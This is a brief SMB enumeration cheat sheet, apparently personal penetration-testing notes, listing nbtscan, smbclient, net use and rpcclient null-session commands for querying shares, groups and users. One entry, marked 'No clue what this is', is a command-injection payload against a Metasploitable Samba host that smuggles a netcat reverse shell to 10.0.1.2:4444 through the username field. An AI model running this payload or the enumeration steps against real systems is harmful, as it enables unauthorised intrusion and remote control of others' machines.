Get Hostname
nbtscan <ip-address>
Get Shares
smbclient -I <ip-address> -L <hostname>
Interact with Share
smbclient \\\\<ip-address>\\share -U <user>
No clue what this is
smbclient -I 10.0.0.107 -LMETASPLOITABLE -U"/=`nohup mkfifo /tmp/p; nc 10.0.1.2 4444 0</tmp/p | /bin/sh >/tmp/p 2>&1; rm /tmp/p `"
Mount Share (Windows)
net use \\<target-ip>\share <password> /u:<username>
rpcclient (null session)
rpcclient -U "" ip.addr
List all Groups
enumdomgroups
Query a Group
querygroup 0x44f
Query Member of Group
querygroupmem 0x44f
Query Users
enumdomusers
Query a User
queryuser 0x451